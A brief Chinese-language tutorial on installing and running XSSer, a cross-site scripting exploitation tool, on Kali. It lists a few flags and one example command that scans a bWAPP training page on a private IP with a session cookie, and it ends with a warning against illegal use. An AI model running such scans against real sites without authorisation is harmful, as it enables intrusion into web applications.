今天给大家介绍一款xss漏洞利用工具:xsser
一、环境:kali19.4 python3
二、安装过程:
1、复制到本地安装包
git clone https://github.com/epsylon/xsser.git
2、安装依赖
cd xsser
python3 setup.py install
三、命令
xsser -h 帮助
-u 指定 URL
-g GET 请求时使用
-p POST 请求时使用
–cookie 指定cookie
xsser -u ‘http://192.168.1.119/’ -g ‘bwapp/xss_get.php?firstname=XSS&lastname=2222222222&form=submit’ --cookie="security_level=0; PHPSESSID=omf3ns0n6“
禁止非法,后果自负
